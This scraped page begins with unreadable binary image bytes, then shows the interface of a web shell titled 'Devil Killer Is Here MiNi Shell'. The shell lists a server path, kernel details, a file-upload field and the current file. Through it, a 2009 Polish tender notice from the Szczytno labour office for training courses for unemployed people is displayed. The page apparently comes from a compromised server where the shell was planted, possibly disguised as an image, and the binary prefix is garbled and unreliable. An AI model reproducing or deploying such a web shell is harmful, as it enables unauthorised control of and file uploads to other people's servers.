JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/87262-N-2009.html

<p class="kh_header"><b>Szczytno: Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia pięciu różnych tematycznie szkoleń dla osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie, w ramach projektu NOWE PERSPEKTYWY współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego .</b><br>
<b>Numer ogłoszenia: 87262 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Szczytnie , ul. Ogrodowa 17, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 6243287, faks 0-89 6243287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczytno.up.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szczytno.up.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w zakresie zorganizowania i przeprowadzenia pięciu różnych tematycznie szkoleń dla osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie, w ramach projektu NOWE PERSPEKTYWY współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla osób zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Szczytnie. Zamówienie publiczne zalicza się do kategorii: Usług edukacyjnych i szkoleniowych o symbolu 80000000-4, Usług szkolenia zawodowego o symbolu 80530000-8, Usług szkolenia komputerowego o symbolu 80533100-0, zgodnie ze Wspólnym Słownikiem Zamówień (CPV). Zamówienie dotyczy przeprowadzenia pięciu różnych tematycznie szkoleń, łącznie dla około 105 osób bezrobotnych (planuje się średnio po ok. 17 osób na każdym szkoleniu). Zamówienie publiczne zostało podzielone na pięć części, z czego każda część stanowi odrębne szkolenie. Każda część będzie oddzielnie oceniana i dopuszcza się składanie ofert częściowych na wybraną część zamówienia (na wybrany kierunek szkolenia)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy nie podlegają wykluczeniu 
na podstawie art. 24 ust. 1 i 2 Pzp oraz spełniają warunki określone w art. 22 ust. 1 Ustawy, tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
a także spełniają dodatkowe warunki udziału w postępowaniu:
d) są instytucjami szkoleniowymi w rozumieniu ustawy z dnia 20 kwietnia 2004 r.    o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiadają wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej,
e) spełniają warunki określone w specyfikacji istotnych warunków zamówienia.
Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z art. 24 ust. 4 Pzp. Zamawiający dokona oceny spełnienia tych warunków na podstawie dokumentów złożonych wraz z ofertą, wskazanych w niniejszej specyfikacji, w szczególności:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy;
b) zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy; 
c) aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub odpis z właściwego rejestru;
d) zaświadczenie z ZUS oraz Urzędu Skarbowego o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia należy przedstawić w formie pisemnej.
- Wypełniony przez wykonawcę FORMULARZ OFERTY SZKOLENIA stanowiący Załącznik nr 1 do specyfikacji istotnych warunków zamówienia - według załączonego do specyfikacji wzoru wraz z załącznikami, w tym wypełniony załącznik do OFERTY SZKOLENIA dotyczący bazy sprzętowej przewidzianej do wykorzystania w trakcie szkolenia Ofertę wraz z wymaganymi załącznikami należy złożyć w oryginale. 
- Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie 
z art. 22 ust. 1 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy - zgodnie z załączonym do specyfikacji istotnych warunków zamówienia formularzem.  
- W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, wykonawca jest zobowiązany dołączyć 
do oferty następujące dokumenty:
a) oryginał lub potwierdzoną za zgodność z oryginałem kopię zaświadczenia o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy (WUP) właściwy ze względu na adres siedziby instytucji szkoleniowej. 
Fakt posiadania przez instytucję szkoleniową wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl.
b) oryginał lub potwierdzoną za zgodność z oryginałem kopię aktualnego zaświadczenia o wpisie podmiotu do ewidencji działalności gospodarczej lub aktualny odpis z Krajowego Rejestru Sądowego albo innego właściwego rejestru określającego status prawny, rodzaj i zakres działalności oraz organy lub osoby upoważnione do występowania w imieniu wykonawcy i zawierający zapis o prowadzeniu edukacji w formach pozaszkolnych, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert do przetargu;
c) oryginały lub potwierdzoną za zgodność z oryginałem kopię aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert do przetargu;
d) oryginał lub potwierdzoną za zgodność z oryginałem kopię decyzji właściwego kuratora oświaty w sprawie przyznania akredytacji dla placówek i ośrodków prowadzących kształcenie ustawiczne w formach pozaszkolnych w zakresie kierunku szkolenia objętego przetargiem, w przypadku kiedy wykonawca uzyskał akredytację właściwego kuratora oświaty;
e) oryginały lub potwierdzone za zgodność z oryginałem przez wykonawcę kopie dodatkowych dokumentów potwierdzających uprawnienia instytucji szkoleniowych, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
- W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca jest zobowiązany dołączyć do oferty następujące dokumenty:
a) wykaz kadry dydaktycznej zaangażowanej w realizację szkolenia, którą dysponuje lub będzie dysponował wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat kwalifikacji zawodowych tych osób, ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - według załączonych do specyfikacji istotnych warunków zamówienia wzorów załączników do OFERTY SZKOLENIA. Do oferty należy dołączyć potwierdzone za zgodność z oryginałem przez wykonawcę kopie dokumentów potwierdzających kwalifikacje zawodowe oraz wymagane uprawnienia wykładowców/instruktorów do prowadzenia wymienionych kierunków szkoleń, wskazanych w Opisie poszczególnych części zamówienia publicznego;
b) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych 
do wykonania zamówienia,  jeżeli w wykazie, o którym mowa w pkt a, wykonawca wskazał osoby, którymi będzie dysponował.  
- Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona - w oryginale lub notarialnie poświadczona kopia pełnomocnictwa.
- Na podstawie art. 26 ust. 3 Pzp Zamawiający wezwie wykonawców, którzy 
w określonym terminie nie złożyli wymienionych wyżej oświadczeń i dokumentów niezbędnych do przeprowadzenia postępowania lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40.0</li>
<li>2 - Program szkolenia i metodyka nauczania - 20.0</li>
<li>3 - Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4 - Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5 - Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szczytno.up.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Ogrodowa 17, 12 - 100 Szczytno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12 - 100 Szczytno
Sekretariat - pokój nr 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia dla osób bezrobotnych będą zorganizowane w ramach projektu NOWE PERSPEKTYWY, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS ZAKŁADANIA I PROWADZENIA WŁASNEJ FIRMY Z OBSŁUGĄ KOMPUTERA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Celem szkolenia jest promowanie idei przedsiębiorczości wśród osób bezrobotnych oraz  przygotowanie ich do założenia, a następnie samodzielnego prowadzenia własnej działalności gospodarczej.
- Szkolenie będzie zorganizowane dla dwóch grup szkoleniowych (łącznie dla 40 osób bezrobotnych) - maksymalnie po 20 osób w każdej grupie.
- Szkoleniem będą objęte jednocześnie dwie grupy szkoleniowe prowadzone w tym samym terminie.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian, nastawiony na rozwój kompetencji interpersonalnych i doskonalenie cech przedsiębiorczych. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. W II połowie trwania szkolenia każdy uczestnik powinien zostać objęty coachingiem, polegającym na pomocy i kierowaniu rozwojem umiejętności oraz kompetencji osoby, prowadzonym indywidualnie przez trenera. Łącznie zagadnienia te powinny obejmować 22 godziny (w tym 2 godziny coachingu).
II BLOK: Obowiązujące uregulowania prawno - ekonomiczne dotyczące zakładania i prowadzenia działalności gospodarczej, w tym: decyzja o wyborze rodzaju działalności gospodarczej, procedury prawno - administracyjne dotyczące rejestracji podmiotu gospodarczego - kolejne etapy zakładania firmy, analiza rynku, warsztaty tworzenia biznesplanów z uwzględnieniem specyfiki różnych branż (zgłaszane przez uczestników szkolenia), obowiązki przedsiębiorcy względem Urzędu Skarbowego i ZUS, prowadzenie dokumentacji finansowo - księgowej i podatkowej samodzielnego podmiotu gospodarczego, elementy marketingu i promocji w prowadzeniu własnej firmy oraz możliwości pozyskiwania środków unijnych na rozwój własnej działalności. Szczególny nacisk należy położyć na analizę poszczególnych biznesplanów sporządzonych przez uczestników szkolenia. Zajęcia te powinny odbywać się głównie metodą warsztatową, a także w ramach zajęć symulacyjnych i gier edukacyjnych. Zagadnienia te powinny obejmować 60 godzin zajęć dydaktycznych. 
III BLOK: Obsługa komputera w prowadzeniu małego biznesu, w tym: obsługa środowiska Windows, wybrane zagadnienia z pakietu Microsoft Office, obsługa Internetu oraz programów użytkowych wspomagających prowadzenie własnej firmy. Łącznie zagadnienia te powinny obejmować 40 godzin. Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS KELNERA - BARMANAZ JĘZYKIEM ANGIELSKIM I OBSŁUGĄ KASY FISKALNEJ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Celem szkolenia jest przygotowanie uczestników szkolenia do samodzielnej pracy w zawodzie kelnera - barmana.
- Program szkolenia powinien zapewnić uczestnikom nabycie obecnie obowiązujących umiejętności poszukiwanych przez pracodawców w zawodzie kelnera - barmana.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy. Łącznie zagadnienia te powinny obejmować 20 godzin.
II BLOK: Zagadnienia teoretyczne niezbędne do pracy w zawodzie kelnera - barmana oraz wizerunek i kultura zawodu, w tym ćwiczenia warsztatowe. Łącznie zagadnienia te powinny obejmować 100 godzin.
III BLOK: Zajęcia praktyczne w zakładach pracy. Łącznie zagadnienia te powinny obejmować 160 godzin.
IV BLOK: Nauka języka angielskiego w dwóch grupach szkoleniowych (maksymalnie po 10 osób w każdej grupie). Zakres tematyczny powinien w głównej mierze obejmować naukę języka pod kątem zdobycia umiejętności posługiwania się językiem obcym w zakresie objętym szkoleniem. Łączna liczba godzin: 80 godzin. 
V BLOK: Obsługa kasy fiskalnej - 40 godzin (w tym: 30 godzin zajęć praktycznych)
- Wykonawca powinien zagwarantować taką ilość kas fiskalnych jednocześnie, aby podczas zajęć praktycznych na jedną kasę przypadały maksymalnie dwie osoby (kupujący-sprzedający).
- Należy zapewnić optymalną ilość oraz odpowiednią jakość bazy do realizacji zajęć praktycznych, dostosowaną do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną.
- Zajęcia praktyczne powinny odbywać się w grupach liczbowo dostosowanych do wielkości i warunków wybranych obiektów gastronomicznych, zapewniających indywidualne podejście do kursanta.
- Miejsca odbywania zajęć praktycznych powinny posiadać odpowiednio wysoki standard świadczonych usług oraz gwarantować solidne przygotowanie 
uczestników szkolenia do wykonywania zawodu objętego szkoleniem..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materialy dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS TECHNOLOGA ROBÓT WYKOŃCZENIOWYCH W BUDOWNICTWIE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Celem szkolenia jest przygotowanie uczestników szkolenia do samodzielnej pracy na stanowisku technologa robót wykończeniowych w budownictwie z zastosowaniem nowoczesnych technologii, w tym m.in. w zakresie prac malarsko-szpachlarskich, glazurniczo-posadzkarskich, montażu ścian z płyt kartonowo-gipsowych i sufitów podwieszanych, paneli podłogowych i ściennych, zastosowania tynków szlachetnych.
- Należy zapewnić optymalną ilość nowoczesnego i sprawnego sprzętu i maszyn, dostosowaną do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną.
- Miejsce odbywania zajęć praktycznych i kadra dydaktyczna powinny gwarantować solidne przygotowanie uczestników szkolenia do wykonywania zawodu objętego szkoleniem. Należy zaplanować częściowe przeprowadzenie zajęć praktycznych na bazie instytucji użyteczności publicznej wskazanej przez Zamawiającego. Front robót wskazanych przez Zamawiającego (składających się na zajęcia praktyczne przeprowadzone we wskazanej instytucji) należy ustalić 
z Zamawiającym przed przygotowaniem oferty..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS KASJERA HANDLOWEGO Z EUROPEJSKIM CERTYFIKATEM UMIEJĘTNOŚCI KOMPUTEROWYCH ECDL e-OBYWATEL (e-CITIZEN).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Celem szkolenia jest uzyskanie kwalifikacji zawodowych w zawodzie kasjera handlowego oraz przygotowanie uczestników szkolenia do egzaminu praktycznego z zakresu ECDL e-Obywatel (e-Citizen). 
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy. Łącznie zagadnienia te powinny obejmować 30 godzin.
II BLOK: Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne w zawodzie kasjera handlowego sprzedawcy, w tym m.in. dokumentacja sklepowa, obsługa klienta z wykorzystaniem nowoczesnych metod i technik sprzedaży. Łącznie zagadnienia te powinny obejmować 80 godzin.
III BLOK: Obsługa kasy fiskalnej - 40 godzin (w tym: 30 godzin zajęć praktycznych)
Wykonawca powinien zagwarantować taką ilość kas fiskalnych jednocześnie, aby podczas zajęć praktycznych na jedną kasę przypadały maksymalnie dwie osoby (kupujący-sprzedający).
IV BLOK: Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen) - 100 godz. Ogólne wskazania dotyczące Bloku IV - Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen):
Zajęcia z tego modułu powinny pomóc użytkownikom wykorzystywać maksymalnie Internet poprzez wyjaśnienie reguł jego działania oraz pokazanie jak może on być użyty do wielu zastosowań. W szczególności należy uwzględnić takie dziedziny życia codziennego jak: załatwianie spraw urzędowych, znajdowanie informacji, w tym związanych z zatrudnieniem i ofertami pracy, a także robienie zakupów, komunikowanie się z rodziną i przyjaciółmi za pośrednictwem Internetu. 
- Szkolenie powinno być przeprowadzone przez instytucję szkoleniową posiadającą uprawnienia do egzaminowania w zakresie Europejskiego Certyfikatu Umiejętności Komputerowych oraz wyposażoną w odpowiedni sprzęt i oprogramowanie niezbędne 
do przeprowadzenia egzaminu ECDL e-Obywatel.
- Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. 
- Egzamin powinien być przeprowadzony przez egzaminatorów ECDL posiadających certyfikat Egzaminatora ECDL e-Obywatel oraz wpisanych na listę egzaminatorów ECDL prowadzoną przez Polskie Biuro ECDL. 
- Do oferty należy dołączyć dokumenty potwierdzające posiadanie powyższych uprawnień, zarówno przez instytucję szkoleniową jak i wykładowców/ egzaminatorów z ramienia instytucji szkoleniowej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredyatcja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
